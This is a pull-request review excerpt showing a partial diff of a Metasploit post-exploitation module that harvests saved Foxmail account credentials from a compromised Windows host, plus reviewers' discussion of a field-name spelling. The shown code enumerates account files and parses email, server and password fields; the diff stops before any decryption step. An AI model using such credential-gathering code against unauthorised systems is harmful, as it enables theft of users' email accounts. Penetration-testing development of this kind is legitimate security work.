modules/post/windows/gather/credentials/foxmail.rb

```diff
@@ -0,0 +1,196 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather Foxmail Passwords',
+        'Description' => %q{
+          This module can decrypt the password of foxmail,
+          if the user chooses to remember the password.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://github.com/jacobsoo/FoxmailRecovery']
+        ],
+        'Author' => [
+          'jacobsoo', # Original author of the Foxmail account decryption script.
+          'Kali-Team <kali-team[at]qq.com>' # Metasploit module
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ]
+      )
+    )
+    register_options(
+      [
+        OptString.new('ACCOUNT_PATH', [ false, 'Specifies the Account directory path for Foxmail']),
+      ]
+    )
+  end
+
+  def find_string(file, offset, length = 0)
+    result_string = ''
+    if length == 0
+      while (file[offset] > "\x20" && file[offset] < "\x7f")
+        result_string << file[offset]
+        offset += 1
+      end
+      return result_string
+    elsif offset && length != 0
+      return file[offset, length].unpack1('S!*') # port
+    else
+      return nil
+    end
+  end
+
+  def pass; end
+
+  def enum_session_file(fpath)
+    account_paths = []
+    session.fs.dir.foreach(fpath) do |mail_addr|
+      account_path = fpath + '\\' + mail_addr + '\\Accounts\\Account'
+      account_paths.push(account_path + '.rec0') if session.fs.file.exist?(account_path + '.rec0')
+      account_paths.push(account_path + '.stg') if session.fs.file.exist?(account_path + '.stg')
+      account_paths.push(account_path + '.tdat') if session.fs.file.exist?(account_path + '.tdat')
+    end
+    tbl = []
+    print_status("Search account files on #{fpath}")
+
+    # enum session file
+    account_paths.each do |file_name|
+      file = read_file(file_name)
+      if file.nil? || file.empty?
+        next
+      end
+
+      print_good("Parsing configuration file: '#{file_name}', please wait.")
+      offset = 0
+      version = 0
+      if file[0] == "\xD0"
+        offset = 2
+      else
+        offset = 9
+        version = 1
+      end
+      index = 0
+      buffer = ''
+      email_info = {}
+      while index < file.length
+        if (file[index] && file[index] > "\x20" && file[index] < "\x7f" && file[index] != "\x3d")
+          buffer += file[index]
+          if ['Email', 'IncomingServer', 'OutgoingServer', 'Password'].include?(buffer)
+            email_info[buffer] = find_string(file, index + offset) || nil
+          elsif ['IncomingPort', 'OutgoingPort'].include?(buffer)
+            email_info[buffer] = find_string(file, index + 5, 2) || nil
+          elsif ['InComingSSL', 'OutgoingSSL'].include?(buffer)
```

Comment:
Waiting feedback on this one still, GitHub says its outdated but still not sure if this should be capital or lowercase, as it could be a typo on our part or it could be a typo in the code of FoxMail, in which case this code is fine. @cn-kali-team can you clarify this please?

Reply:
Yes, it's a lowercase letter. You can execute "strings Account.rec0 |grep IncomingPort"

Reply:
Woops seems like the comment on this one didn't go through. I found in my tests that the Account.rec0 file had the string as InComingSSL, not as IncomingSSL as I expected. Therefore this is a typo on FoxMail's end so the way it is typed in the module is fine.